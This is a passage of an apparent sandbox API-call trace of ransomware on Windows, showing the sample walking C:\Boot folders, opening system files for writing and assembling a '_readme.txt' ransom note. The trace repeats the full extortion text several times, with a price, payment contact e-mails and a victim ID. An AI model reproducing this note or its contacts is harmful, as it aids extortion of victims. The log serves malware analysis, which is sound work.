payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.016] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.016] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.016] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0210.016] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.016] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.017] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.017] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.017] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0210.017] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.017] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.017] PathFindFileNameW (pszPath="") returned="" [0210.017] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.017] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.018] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.018] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.018] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0210.018] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0210.018] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.018] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.018] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.018] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.019] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0210.019] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.019] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.019] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.019] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.019] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0210.019] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.019] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.019] PathFindFileNameW (pszPath="") returned="" [0210.019] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.020] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.020] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.020] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.020] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0210.020] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0210.020] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.020] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0210.021] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.021] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0210.021] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0210.021] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.021] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0210.021] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.022] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0210.022] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.022] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0210.023] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.023] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned=".ttf" [0210.023] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0210.023] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0210.023] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0210.023] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0210.023] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0210.023] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0210.023] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0210.023] PathFindFileNameW (pszPath="") returned="" [0210.023] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0210.024] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0210.024] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0210.024] FreeLibrary (hLibModule=0x761b0000) returned 1 [0210.024] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0210.024] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0210.024] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0210.024] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal 